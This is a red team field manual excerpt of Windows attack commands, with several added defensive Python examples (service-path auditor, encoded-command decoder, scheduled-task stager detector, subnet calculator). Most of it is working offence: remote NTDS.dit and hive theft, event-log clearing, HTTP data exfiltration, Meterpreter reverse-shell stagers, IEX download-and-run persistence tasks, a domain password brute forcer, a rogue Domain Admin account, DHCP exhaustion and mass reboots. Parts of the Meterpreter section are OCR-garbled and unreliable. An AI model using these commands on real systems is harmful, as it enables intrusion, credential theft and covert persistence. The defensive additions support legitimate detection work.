SEARCH FOR SERVICES WITH UNQUOTED PATHS TO BINARY


wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
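The three findstr filters above select auto-start services whose binary lives outside C:\Windows\ and whose path carries no quotes; a space in the directory part of such a path is what lets the service control manager try a different executable before the intended one, which is why this is an audit item. The following Python function is an added example (not from the book) that applies the same test to service records so the result can be reviewed or fed into a report. The rows in SERVICES are constructed for the example, and the function names are this example's own.

```python
#!/usr/bin/env python3
"""Apply the unquoted-service-path test from the wmic one-liner above to
service records: auto-start, binary outside C:\\Windows\\, path not quoted,
and a space somewhere before the executable name.
Added example, not from the book; the service rows below are constructed."""
import re

# Rows in the column order of the wmic query above:
# (name, displayname, pathname, startmode). Constructed for this example.
SERVICES = [
    ("Spooler", "Print Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("AcmeUpd", "Acme Updater", r"C:\Program Files\Acme Corp\updater.exe -svc", "Auto"),
    ("AcmeAgent", "Acme Agent", r'"C:\Program Files\Acme Corp\agent.exe" -svc', "Auto"),
    ("LegacyBk", "Legacy Backup", r"C:\Legacy Tools\bk\backup.exe", "Manual"),
    ("Tiny", "Tiny Svc", r"C:\tiny\svc.exe", "Auto"),
]

# Everything up to and including the first ".exe" is the executable path;
# whatever follows is arguments and does not matter for the test.
EXE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def unquoted_path_risk(pathname):
    """True if the executable path is unquoted and contains a space."""
    path = pathname.strip()
    if path.startswith('"'):
        return False                       # quoted: the loader will not split it
    match = EXE.match(path)
    exe_path = match.group(1) if match else path
    return " " in exe_path


def find_unquoted_services(rows):
    """Return the names of services that pass all three findstr filters above."""
    hits = []
    for name, _display, pathname, startmode in rows:
        if startmode.lower() != "auto":
            continue                       # findstr /i "auto"
        if pathname.strip().strip('"').lower().startswith("c:\\windows\\"):
            continue                       # findstr /i /v "c:\windows\\"
        if unquoted_path_risk(pathname):   # findstr /i /v """ plus the space test
            hits.append(name)
    return hits


if __name__ == "__main__":
    for svc in find_unquoted_services(SERVICES):
        print("unquoted service path:", svc)
```

The fix for a flagged service is to quote the ImagePath value in the registry (sc config name binpath= "\"C:\Program Files\...\x.exe\"") so the loader stops searching the intermediate directories.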
VOLUME SHADOW COPY


1. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin list shadows > c:\temp\output.txt 2>&1"


# If any copies already exist then exfil, otherwise create using
# following commands. Check output.txt for any errors


2. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin create shadow /for=C: > C:\temp\output.txt 2>&1"

3. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\system.hive > C:\temp\output.txt 2>&1"

4. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\NTDS\NTDS.dit C:\temp\ntds.dit > C:\temp\output.txt 2>&1"


# Step by step instructions on room362.com for step below


5. From Linux, download and run ntdsxtract and libesedb to export
   hashes or other domain information
   a. Additional instructions found under the VSSOWN section
   b. ntdsxtract - http://www.ntdsxtract.com
   c. libesedb - http://code.google.com/p/libesedb/
POWERSHELL


stop-transcript                                Stops recording
get-content file                               Displays file contents
get-help command -examples                     Shows examples of command
get-command *string*                           Searches for cmd string
get-service                                    Displays services (stop-service,
                                               start-service)
get-wmiobject -class win32_service             Displays services, but takes
                                               alternate credentials
$PSVersionTable                                Display powershell version
powershell.exe -version 2.0                    Run powershell 2.0 from 3.0
get-service | measure-object                   Returns # of services
get-psdrive                                    Returns list of PSDrives
get-process | select -expandproperty name      Returns only names
get-help * -parameter credential               Cmdlets that take creds
get-wmiobject -list *network                   Available WMI network cmds
[Net.DNS]::GetHostEntry("ip")                  DNS Lookup


CLEAR SECURITY & APPLICATION EVENT LOG FOR REMOTE SERVER (SVR01)


Get-EventLog -list
Clear-EventLog -logname Application, Security -computername SVR01


EXPORT OS INFO INTO CSV FILE


Get-WmiObject -class win32_operatingsystem | select -property * | export-csv os.txt


LIST RUNNING SERVICES


Get-Service | Where-Object {$_.status -eq "Running"}


PERSISTENT PSDRIVE TO REMOTE FILE SHARE:


New-PSDrive -Persist -PSProvider FileSystem -Root \\1.1.1.1\tools -Name i


RETURN FILES WITH WRITE DATE PAST 8/20


Get-ChildItem -Path c:\ -Force -Recurse -Filter *.log -ErrorAction SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"}


FILE DOWNLOAD OVER HTTP


(new-object system.net.webclient).downloadFile("url","dest")


TCP PORT CONNECTION (SCANNER)


$ports=(#,#,#);$ip="x.x.x.x";foreach ($port in $ports) {try{$socket=New-Object System.Net.Sockets.TCPClient($ip,$port);}catch{};if ($socket -eq $NULL) {echo $ip":"$port" - Closed";}else{echo $ip":"$port" - Open";$socket = $NULL;}}


PING WITH 500 MILLISECOND TIMEOUT


$ping = New-Object System.Net.NetworkInformation.ping
$ping.send("ip", 500)
BASIC AUTHENTICATION POPUP


powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $Host.UI.PromptForCredential("title","message","user","domain")


RUN EXE EVERY 4 HOURS BETWEEN AUG 8-11, 2013 AND THE HOURS OF 0800-1700 (FROM CMD.EXE)


powershell.exe -Command "do {if ((Get-Date -format yyyyMMdd-HHmm) -match '^201308(0[8-9]|1[0-1])-(0[8-9]|1[0-7])[0-5][0-9]') {Start-Process -WindowStyle Hidden 'C:\Temp\my.exe';Start-Sleep -s 14400}}while(1)"


POWERSHELL RUNAS


$pw = convertto-securestring -string "PASSWORD" -asplaintext -force;
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "DOMAIN\user",$pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process file.exe -verb runas}'


EMAIL SENDER


powershell.exe Send-MailMessage -to "email" -from "email" -subject "Subject" -a "attachment file path" -body "Body" -SmtpServer TargetEmailServerIP


TURN ON POWERSHELL REMOTING (WITH VALID CREDENTIALS)


net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item wsman:\localhost\client\trustedhosts *'"
at \\ip time+2 "Powershell -Command 'Restart-Service WinRM'"
Enter-PSSession -ComputerName ip -Credential username


LIST HOSTNAME AND IP FOR ALL DOMAIN COMPUTERS


Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class MicrosoftDNS_ResourceRecord -Filter "domainname='DOMAIN'" | select textrepresentation


POWERSHELL DOWNLOAD OF A FILE FROM A SPECIFIED LOCATION


powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $source="""https://YOUR_SPECIFIED_IP/file.zip"""; $destination="""C:\master.zip"""; $http = new-object System.Net.WebClient; $response = $http.DownloadFile($source, $destination);"


POWERSHELL DATA EXFIL


Script will send a file ($filepath) via http to server ($server) via POST
request. Must have web server listening on port designated in the $server


powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server="""https://YOUR_SPECIFIED_IP/folder"""; $filepath="""C:\master.zip"""; $http = new-object System.Net.WebClient; $response = $http.UploadFile($server, $filepath);"
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USING POWERSHELL TO LAUNCH METERPRETER FROM MEMORY 


v Need Metasploit v4.5+ (msfvenom supports Powershell) 
v Use Powershell (x86) with 32 bit Meterpreter payloads 
v encodeMeterpreter.psl script can be found on next page 


ON ATTACK BOXES 


I ./msfvenom -p windows/meterpreter/reverse https -f psh -a x86 
LHOST=1.1.1.1 LPORT=443 audit.psl 

2. Move audit.psl into same folder as encodeMeterpreter.psl 

s Launch Powershell (x86) 

4. powershell.exe -executionpolicy bypass encodeMeterpreter.psl 

S Copy the encoded Meterpreter string 


START LISTENER ON ATTACK BOX 


./msfconsole 

use exploit/multi/handler 

set payload windows/meterpreter/reverse https 
set LHOST 1.1.1.1 

set LPORT 443 

exprfort 7 


O) Ol ve C) F2 HƏ 


ON TARGET (MUST USE POWERSHELL (X86)) 


1. powershell.exe -noexit -encodedCommand paste encoded Meterpreter string here 
2. PROFIT 


ENCODEMETERPRETER.PS1 [7] 


# Get Contents of Script 
$contents = Get-Content audit.ps1 


# Compress Script 
$ms = New-Object IO.MemoryStream 
$action = [IO.Compression.CompressionMode]::Compress 
$cs = New-Object IO.Compression.DeflateStream ($ms, $action) 
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII) 
$contents | ForEach-Object {$sw.WriteLine($_)} 
$sw.Close() 


# Base64 Encode Stream 
$code = [Convert]::ToBase64String($ms.ToArray()) 
$command = "Invoke-Expression `$(New-Object IO.StreamReader(`$(New-Object IO.Compression.DeflateStream(`$(New-Object IO.MemoryStream (,`$([Convert]::FromBase64String(`"$code`")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" 


# Invoke-Expression $command 
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) 
$encodedCommand = [Convert]::ToBase64String($bytes) 


# Write to Standard Out 
Write-Host $encodedCommand 


Copyright 2012 TrustedSec, LLC. All rights reserved. 
Please see reference [7] for disclaimer 
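The encoded string that encodeMeterpreter.ps1 emits is what a defender finds in process-creation logs. The following added example (not TrustedSec's or the RTFM's code) undoes the two layers from the analyst's side: the outer Base64-over-UTF-16LE of -encodedCommand, then the raw-Deflate blob inside the Invoke-Expression/StreamReader template. build_sample reproduces the encoder's transformations on a constructed benign script so the decoder can be exercised offline; the markers list is the set of strings an analyst can search for in logs.

```python
"""Decode the two-layer PowerShell -encodedCommand produced by a
Deflate + Base64 stager such as encodeMeterpreter.ps1 (added example)."""
import base64
import re
import zlib
from typing import List, Optional

# Extracts the inner Base64 blob from the FromBase64String("...") call
INNER_RE = re.compile(r"FromBase64String\(\s*[`\"']*([A-Za-z0-9+/=]+)")

# Template strings that identify this encoding technique in logs
MARKERS = ("Invoke-Expression", "DeflateStream", "FromBase64String", "StreamReader")


def decode_outer(encoded: str) -> str:
    """Layer 1: -encodedCommand is Base64 over the UTF-16LE command text."""
    return base64.b64decode(encoded).decode("utf-16-le")


def inflate_inner(command: str) -> Optional[str]:
    """Layer 2: DeflateStream writes raw deflate data (no zlib header), so wbits=-15."""
    m = INNER_RE.search(command)
    if not m:
        return None
    return zlib.decompress(base64.b64decode(m.group(1)), -15).decode("ascii")


def markers_present(command: str) -> List[str]:
    return [m for m in MARKERS if m in command]


def unwrap(encoded: str) -> dict:
    """Full triage: decoded wrapper, indicator strings and the recovered script (or None)."""
    command = decode_outer(encoded)
    return {"command": command,
            "markers": markers_present(command),
            "script": inflate_inner(command)}


def build_sample(script: str) -> str:
    """Reproduce the encoder's steps in Python (constructed test input, not a capture)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw deflate like IO.Compression.DeflateStream
    raw = comp.compress(script.encode("ascii")) + comp.flush()
    code = base64.b64encode(raw).decode("ascii")
    command = (
        "Invoke-Expression $(New-Object IO.StreamReader($(New-Object "
        "IO.Compression.DeflateStream($(New-Object IO.MemoryStream "
        f"(,$([Convert]::FromBase64String(\"{code}\")))), "
        "[IO.Compression.CompressionMode]::Decompress)), "
        "[Text.Encoding]::ASCII)).ReadToEnd();"
    )
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


if __name__ == "__main__":
    sample = build_sample("Write-Host 'benign test script'\r\n")
    print(unwrap(sample))
```

The same two-step decode applies to any -encodedCommand value; a string whose decoded wrapper contains several of the markers but no recoverable inner script (for example a different compression scheme) still deserves a look, which is why unwrap returns the markers separately from the script.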
USING POWERSHELL TO LAUNCH METERPRETER (2ND METHOD) 


ON BT ATTACK BOX 


1. msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=8080 R | msfencode -t psh -a x86 


ON WINDOWS ATTACK BOX 


1. c:\> powershell 

2. PS c:\> $cmd = " PASTE THE CONTENTS OF THE PSH SCRIPT HERE " 
3. PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd) 
4. PS c:\> $e = [Convert]::ToBase64String($u) 

5. PS c:\> $e 


Copy contents of $e 


START LISTENER ON ATTACK BOX 


./msfconsole 

use exploit/multi/handler 

set payload windows/meterpreter/reverse_tcp 
set LHOST 1.1.1.1 

set LPORT 8080 

exploit -j 




ON TARGET SHELL (1: DOWNLOAD SHELLCODE, 2: EXECUTE) 


1. c:\> powershell -noprofile -noninteractive -command "& {$client=new-object System.Net.WebClient;$client.DownloadFile('http://1.1.1.1/shell.txt','c:\windows\temp\shell.txt')}" 

2. c:\> powershell -noprofile -noninteractive -noexit -command "& {$cmd=type 'c:\windows\temp\shell.txt';powershell -noprofile -noninteractive -noexit -encodedCommand $cmd}" 

PROFIT 
WINDOWS REGISTRY 


OS INFORMATION 


HKLM\Software\Microsoft\Windows NT\CurrentVersion 


PRODUCT NAME 


HKLM\Software\Microsoft\Windows NT\CurrentVersion /v 
ProductName 


DATE OF INSTALL 


HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate 


REGISTERED OWNER 


HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner 


SYSTEM ROOT 


HKLM\Software\Microsoft\Windows NT\CurrentVersion /v SystemRoot 


TIME ZONE (OFFSET IN MINUTES FROM UTC) 


HKLM\System\CurrentControlSet\Control\TimeZoneInformation /v ActiveTimeBias 


MAPPED NETWORK DRIVES 


HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU 


MOUNTED DEVICES 


HKLM\System\MountedDevices 


USB DEVICES 


HKLM\System\CurrentControlSet\Enum\USBStor 


TURN ON IP FORWARDING 


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters - IPEnableRouter = 1 


PASSWORD KEYS: LSA SECRETS CAN CONTAIN VPN, AUTOLOGON, OTHER 
PASSWORDS 


HKEY_LOCAL_MACHINE\Security\Policy\Secrets 
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\autoadminlogon 


AUDIT POLICY 


HKLM\Security\Policy\PolAdTev 
KERNEL/USER SERVICES 


HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services 


INSTALLED SOFTWARE ON MACHINE 


HKLM\Software 


INSTALLED SOFTWARE FOR USER 


HKCU\Software 


RECENT DOCUMENTS 


HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs 


RECENT USER LOCATIONS 


HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU & \OpenSaveMRU 


TYPED URLS 


HKCU\Software\Microsoft\Internet Explorer\TypedURLs 


MRU LISTS 


HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU 


LAST REGISTRY KEY ACCESSED 


HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegEdit /v LastKey 


STARTUP LOCATIONS 


HKLM\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
HKCU\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce 
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load & \Run 


ENUMERATING WINDOWS DOMAIN WITH DSQUERY 


LIST USERS ON DOMAIN WITH NO LIMIT ON RESULTS 


dsquery user -limit 0 


LIST GROUPS FOR DOMAIN=VICTIM.COM 


dsquery group "cn=users,dc=victim,dc=com" 


LIST DOMAIN ADMIN ACCOUNTS 


dsquery group -name "domain admins"| dsget group -members -expand 


LIST ALL GROUPS FOR A USER 


dsquery user -name bob | dsget user -memberof -expand 


GET A USER'S LOGIN ID 


dsquery user -name bob | dsget user -samid 


LIST ACCOUNTS INACTIVE FOR 2 WEEKS 


dsquery user -inactive 2 


ADD DOMAIN USER 


dsadd user "CN=Bob,CN=Users,DC=victim,DC=com" -samid bob -pwd bobpass -display "Bob" -pwdneverexpires yes -memberof "CN=Domain Admins,CN=Users,DC=victim,DC=com" 


DELETE USER 


dsrm -subtree -noprompt "CN=Bob,CN=Users,DC=victim,DC=com" 


LIST ALL OPERATING SYSTEMS ON DOMAIN 


dsquery * "DC=victim,DC=com" -scope subtree -attr "cn" "operatingSystem" "operatingSystemServicePack" -filter "(&(objectclass=computer)(objectcategory=computer)(operatingSystem=Windows*))" 


LIST ALL SITE NAMES 


dsquery site -o rdn -limit 0 


LIST ALL SUBNETS WITHIN A SITE 


dsquery subnet -site sitename -o rdn 


LIST ALL SERVERS WITHIN A SITE 


dsquery server -site sitename -o rdn 
FIND SERVERS IN THE DOMAIN 


dsquery * domainroot -filter "(&(objectCategory=Computer)(objectClass=Computer)(operatingSystem=*Server*))" -limit 0 


DOMAIN CONTROLLERS PER SITE 


dsquery * "CN=Sites,CN=Configuration,DC=forestRootDomain" -filter (objectCategory=Server) 
WINDOWS SCRIPTING 


^ If scripting in a batch file, loop variables must be preceded with %%, i.e. %%i 


NESTED FOR LOOP PING SWEEP 


for /L %i in (10,1,254) do @for /L %x in (10,1,254) do @ping -n 1 -w 100 10.10.%i.%x 2>nul | find "Reply" && echo 10.10.%i.%x >> live.txt 


LOOP THROUGH FILE 


for /F %i in ( file ) do command 


DOMAIN BRUTE FORCER 
for /F %n in (names.txt) do for /F %p in (pawds.txt) do net use \\DC01\IPC$ /user: domain \%n %p 1>NUL 2>&1 && echo %n:%p && net use /delete \\DC01\IPC$ > NUL 


ACCOUNT LOCKOUT (LOCKOUT.BAT) 
@echo Test run: 


for /F %U in (list.txt) do @for /L %C in (1,1,5) do @echo net use \\WIN-1234\c$ /USER:%U wrongpass 


DHCP EXHAUSTION 


for /L %i in (2,1,254) do (netsh interface ip set address local static 1.1.1.%i netmask gw ID & ping 127.0.0.1 -n 1 -w 10000 > nul %1) 


DNS REVERSE LOOKUP 


for /L %i in (100,1,105) do @nslookup 1.1.1.%i | findstr /i /c:"Name" >> dns.txt && echo Server: 1.1.1.%i >> dns.txt 


SEARCH FOR FILES BEGINNING WITH THE WORD "PASS" AND THEN PRINT IF 
IT'S A DIRECTORY, FILE DATE/TIME, RELATIVE PATH, ACTUAL PATH AND 
SIZE (@VARIABLES ARE OPTIONAL) 


forfiles /P c:\temp /s /m pass* -c "cmd /c echo @isdir @fdate @ftime @relpath @path @fsize" 


SIMULATE MALICIOUS DOMAIN CALLOUTS (USEFUL FOR AV/IDS TESTING) 


# Run packet capture on attack domain to receive callout 
# domains.txt should contain known malicious domains 


for /L %i in (0,1,100) do (for /F %n in (domains.txt) do nslookup %n attack domain > NUL 2>&1) & ping -n 5 127.0.0.1 > NUL 2>&1 


IE WEB LOOPER (TRAFFIC GENERATOR) 


for /L %C in (1,1,5000) do @for %U in (www.yahoo.com www.pastebin.com www.paypal.com www.craigslist.org www.google.com) do start /b iexplore %U & ping -n 6 localhost & taskkill /F /IM iexplore.exe 
GET PERMISSIONS ON SERVICE EXECUTABLES 
for /f "tokens=2 delims='='" %a in ('wmic service list full ^|find /i "pathname" ^|find /i /v "system32"') do @echo %a >> c:\windows\temp\3afd4ga.tmp 


for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\3afd4ga.tmp) do cmd.exe /c icacls "%a" 


ROLLING REBOOT (REPLACE /R WITH /S FOR A SHUTDOWN): 


for /L %i in (2,1,254) do shutdown /r /m \\1.1.1.%i /f /t 0 /c "Reboot message" 


SHELL ESCALATION USING VBS (NEEDS ELEVATED CREDENTIALS) 


# Create .vbs script with the following 


Set shell = wscript.createobject("wscript.shell") 

shell.run "runas /user: user " & """" & "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c \" & """" & "IEX ((New-Object Net.WebClient).downloadstring(' url '))" & """" & "\" & """" 


wscript.sleep (100) 
shell.Sendkeys " password " & "{ENTER}" 


TASK SCHEDULER 


^ Scheduled task binary paths CANNOT contain spaces because ever everything 
after the first space in the path is considered to be a command-line 
argument. Enclose the /TR path parameter between backslash (\) AND 
quotation marks ("): 


/TR "\"C:\Program Files\file.exe\" -x arg1" 


TASK SCHEDULER (ST=START TIME, SD=START DATE, ED=END DATE) 
* MUST BE ADMIN 


SCHTASKS /CREATE /TN Task Name /SC HOURLY /ST HH:MM /F /RL HIGHEST /SD MM/DD/YYYY /ED MM/DD/YYYY /tr "C:\my.exe" /RU DOMAIN\user /RP password 


TASK SCHEDULER PERSISTENCE [10] 


* For 64 bit use: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" 


# (x86) on User Login 

SCHTASKS /CREATE /TN Task Name /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http:// ip : port / payload ''))'" /SC onlogon /RU System 


# (x86) on System Start 

SCHTASKS /CREATE /TN Task Name /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http:// ip : port / payload ''))'" /SC onstart /RU System 


# (x86) on User Idle (30 Minutes) 

SCHTASKS /CREATE /TN Task Name /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http:// ip : port / payload ''))'" /SC onidle /i 30 
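The three SCHTASKS entries above share a recognisable action string: powershell.exe launched hidden, with profile and execution policy disabled, pulling a script over HTTP into IEX. The following added example (not the RTFM's code) audits the CSV that `schtasks /query /fo CSV /v` produces for that pattern. The sample CSV is constructed with a reduced set of the real column names (TaskName, Task To Run, Run As User, Schedule Type); the indicator names and the min_hits threshold are this example's own choices.

```python
"""Flag scheduled tasks whose action looks like a PowerShell download-and-run stager.
Added example; SAMPLE_CSV is constructed, not real schtasks output."""
import csv
import io
import re
from typing import Dict, List

# Each indicator is one switch/idiom from the persistence entries above
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "no_profile":         re.compile(r"-no(?:p|profile)\b", re.I),
    "hidden_window":      re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "remote_download":    re.compile(r"downloadstring|downloadfile|net\.webclient", re.I),
    "encoded_command":    re.compile(r"-e(?:nc|ncodedcommand)\b", re.I),
    "invoke_expression":  re.compile(r"\biex\b|invoke-expression", re.I),
}

# Constructed sample: one stock Windows task, one stager, one ordinary backup job
SAMPLE_CSV = """\
"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"WS01","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c","SYSTEM","At idle time"
"WS01","\\Task Name","C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.0.2.10:8080/payload''))'","SYSTEM","At logon time"
"WS01","\\Backup","C:\\Program Files\\Backup\\backup.exe /full","CORP\\backupsvc","Daily"
"""


def score_task(task_to_run: str) -> List[str]:
    """Names of the indicators present in one 'Task To Run' string."""
    return [name for name, rx in INDICATORS.items() if rx.search(task_to_run)]


def audit_schtasks_csv(text: str, min_hits: int = 2) -> List[Dict]:
    """Return the tasks with at least min_hits indicators, with who they run as and when."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        hits = score_task(row.get("Task To Run", ""))
        if len(hits) >= min_hits:
            findings.append({
                "task": row.get("TaskName"),
                "run_as": row.get("Run As User"),
                "schedule": row.get("Schedule Type"),
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in audit_schtasks_csv(SAMPLE_CSV):
        print(f)
```

Requiring two indicators rather than one keeps legitimate -NoProfile maintenance scripts out of the report; a hit that also runs as SYSTEM on logon or start is the combination the entries above produce.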
NETWORKING 


TTL FINGERPRINTING 


Windows    128 
Linux      64 
Network    255 
Solaris    255 


COMMON PORTS 


21      FTP 
22      SSH 
23      Telnet 
25      SMTP 
49      TACACS 
53      DNS 
67/68   DHCP (UDP) 
69      TFTP (UDP) 
80      HTTP 
88      Kerberos 
110     POP3 
111     RPC 
123     NTP (UDP) 
135     Windows RPC 
137     NetBIOS 
138     NetBIOS 
139     SMB 
143     IMAP 
161     SNMP (UDP) 
179     BGP 
201     AppleTalk 
389     LDAP 
443     HTTPS 
445     SMB 
500     ISAKMP (UDP) 
514     Syslog 
520     RIP 
546/7   DHCPv6 
587     SMTP 
902     VMWare 
1080    Socks Proxy 
1194    VPN 
1433/4  MS-SQL 
1521    Oracle 
1629    DameWare 
2049    NFS 
3128    Squid Proxy 
3306    MySQL 
3389    RDP 
5060    SIP 
5222    Jabber 
5432    Postgres 
5666    Nagios 
5900    VNC 
6000    X11 
6129    DameWare 
6667    IRC 
9001    Tor 
9001    HSQL 
9090/1  Openfire 
9100    Jet Direct 
IPv4 


CLASSFUL IP RANGES 


A 0.0.0.0 - 127.255.255.255 
B 128.0.0.0 - 191.255.255.255 
C 192.0.0.0 - 223.255.255.255 
D 224.0.0.0 - 239.255.255.255 
E 240.0.0.0 - 255.255.255.255 


RESERVED RANGES 


10.0.0.0 - 10.255.255.255 

127.0.0.0 - 127.255.255.255 

172.16.0.0 - 172.31.255.255 

192.168.0.0 - 192.168.255.255 


SUBNETTING 

/31 255.255.255.254 1 Host 
/30 255.255.255.252 2 Hosts 
/29 255.255.255.248 6 Hosts 
/28 255.255.255.240 14 Hosts 
/27 255.255.255.224 30 Hosts 
/26 255.255.255.192 62 Hosts 
/25 255.255.255.128 126 Hosts 
/24 255.255.255.0 254 Hosts 
/23 255.255.254.0 510 Hosts 
/22 255.255.252.0 1022 Hosts 
/21 255.255.248.0 2046 Hosts 
/20 255.255.240.0 4094 Hosts 
/19 255.255.224.0 8190 Hosts 
/18 255.255.192.0 16382 Hosts 
/17 255.255.128.0 32766 Hosts 
/16 255.255.0.0 65534 Hosts 
/15 255.254.0.0 131070 Hosts 
/14 255.252.0.0 262142 Hosts 
/13 255.248.0.0 524286 Hosts 
/12 255.240.0.0 1048574 Hosts 
/11 255.224.0.0 2097150 Hosts 
/10 255.192.0.0 4194302 Hosts 
/9 255.128.0.0 8388606 Hosts 
/8 255.0.0.0 16777214 Hosts 


CALCULATING SUBNET RANGE 

Given: 1.1.1.101/28 

* /28 = 255.255.255.240 netmask 

* 256 - 240 = 16 = subnet ranges of 16, i.e. 0, 16, 32, 48, ... 


* Range where given IP falls: 1.1.1.96 - 1.1.1.111 
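The worked calculation above generalises to any prefix length: the netmask is the top `prefix` bits set, the "256 - mask octet" step gives the block size in the first octet that is not 255, and the network/broadcast pair comes from masking the address. The following added example (not from the RTFM) carries that through in code for the page's own 1.1.1.101/28 and for any other CIDR, and cross-checks itself against Python's ipaddress module; the usable-host count follows the table above for /8 through /30 and returns None for /31 and /32, which the table treats as special cases.

```python
"""Subnet arithmetic behind the table above: prefix -> netmask, block size,
network/broadcast and usable host count (added example)."""
import ipaddress
from typing import List, Optional


def ip_to_int(ip: str) -> int:
    a, b, c, d = (int(x) for x in ip.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d


def int_to_ip(n: int) -> str:
    return ".".join(str((n >> s) & 0xFF) for s in (24, 16, 8, 0))


def mask_int(prefix: int) -> int:
    return (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF


def netmask(prefix: int) -> str:
    return int_to_ip(mask_int(prefix))


def usable_hosts(prefix: int) -> Optional[int]:
    """Matches the table for /8 .. /30; /31 and /32 are point-to-point/host cases."""
    return (1 << (32 - prefix)) - 2 if prefix <= 30 else None


def block_size(prefix: int) -> int:
    """'256 - 240 = 16': block size in the first octet of the mask that is not 255."""
    octets = [int(o) for o in netmask(prefix).split(".")]
    interesting = next((o for o in octets if o != 255), 255)
    return 256 - interesting


def block_starts(prefix: int) -> List[int]:
    """The subnet boundaries in the interesting octet: 0, 16, 32, ... for a /28."""
    return list(range(0, 256, block_size(prefix)))


def subnet_range(cidr: str) -> dict:
    ip, prefix_s = cidr.split("/")
    prefix = int(prefix_s)
    mask = mask_int(prefix)
    net = ip_to_int(ip) & mask
    bcast = net | (~mask & 0xFFFFFFFF)
    return {
        "netmask": netmask(prefix),
        "block": block_size(prefix),
        "network": int_to_ip(net),
        "broadcast": int_to_ip(bcast),
        "hosts": usable_hosts(prefix),
    }


def cross_check(cidr: str) -> bool:
    """Verify the hand arithmetic against the standard library."""
    ref = ipaddress.ip_network(cidr, strict=False)
    r = subnet_range(cidr)
    return (r["network"] == str(ref.network_address)
            and r["broadcast"] == str(ref.broadcast_address)
            and r["netmask"] == str(ref.netmask))


if __name__ == "__main__":
    print(subnet_range("1.1.1.101/28"), cross_check("1.1.1.101/28"))
```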
IPv6 


BROADCAST ADDRESSES 


ff02::1 - link-local nodes 
ff05::1 - site-local nodes 
ff01::2 - node-local routers 
ff02::2 - link-local routers 
ff05::2 - site-local routers 


INTERFACE ADDRESSES 


fe80:: - link-local 
2001:: - routable 


::a.b.c.d - IPv4 compatible IPv6 
::ffff:a.b.c.d - IPv4 mapped IPv6 


THC IPv6 TOOLKIT 


Remote Network DoS: 
rsmurf6 eth# remote ipv6 


SOCAT TUNNEL IPv6 THROUGH IPv4 TOOLS 


socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[ ipv6 host ]:8080 
CISCO COMMANDS 




>enable                                      Enter privilege mode 
#configure terminal                          Configure interface 

(config)#interface fa0/0                     Configure FastEthernet 0/0 
